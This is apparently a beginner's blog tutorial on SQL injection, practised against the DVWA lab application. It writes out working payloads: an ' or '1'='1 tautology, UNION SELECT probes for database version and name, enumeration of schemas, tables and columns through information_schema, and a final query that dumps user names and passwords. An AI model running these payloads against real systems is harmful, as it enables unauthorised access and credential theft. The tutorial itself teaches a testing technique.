SQL Injection Simplified
Bond: “My dear, uncooperative Domino.”
Domino: “How do you know that? How do you know my friends call me Domino?”
Bond: “It’s on the bracelet on your ankle.”
Domino: “So, what sharp little eyes you’ve got.”
Bond: “Wait ’till you get to my teeth.”
Domino: “How do you know that? How do you know my friends call me Domino?”
Bond: “It’s on the bracelet on your ankle.”
Domino: “So, what sharp little eyes you’ve got.”
Bond: “Wait ’till you get to my teeth.”
During the last decade of IT security, many articles on SQL injection have been written. I am just putting effort to make it more simple and reader friendly.
This article is just fully devoted to those who are new to SQL injection.
SQL
SQL is nothing but a language which interacts with your database to work on your data. You can store new, retrieve or modify the stored data.
SQL Injection:
SQL injection is a craft that sends end-user Query directly to the application database.
What should we look at:
We should look the page which has direct parameter like
http:// Example.com/search?id=2
(query for this link should be like as : select name from users where id= '2')
also we can directly identify the field from web page.
like
<Form method ="GET" action "#" >
<input type- "Text" name= "ID">
<input type= "Submit" name="Submit">
</From>
How to start testing:
To identify the SQL Inject possibility we can add ' or '1'='1 or ' or 'a' ='a for more refer to the list.
When you will add this to URL. URL will be like
http:// Example.com/search?id=2'or '1' = '1 #
(query for this link should be like as : select name from users where id= '2' or '1' ='1' #')
-- to tell MS SQL to ignore rest Query.
# to tell MYSQL to ignore rest Query and make it for the current instance.
How to start:
let's start with a search box. Pass 1' or '1'='1 # to the input field and watch the output.
As we can see that we get a search result and our Query is also executed.
Now we should go further to test SQL Injection vulnerability. Hence we should check the DB version and DB name to confirm the SQL Injection vulnerability with the following Query:
'union select null, @@version #
'union select null, database() #
After confirming SQL Injection vulnerability we can access the Schema of a system using the following
command:
'union select null, schema_name from information_schema.schemata #
Schema name is always same as database name that contains a table. We can access table directly from Schema using following Query.
'union select null, table_name from information_schema.tables where table_schema= 'dvwa' #
Now we need only column name to access data. hence we should use the following the table.
'union select null, column_name from information_schema.columns where table_name = "users" #
Since we have column name, we can access any data from Database like that
'union select null, concat(first_name, 0x0a,user_id, 0x0a, password) from users #
You can do this on DVWA 1.8 with a low-security setting.
Comments
Post a Comment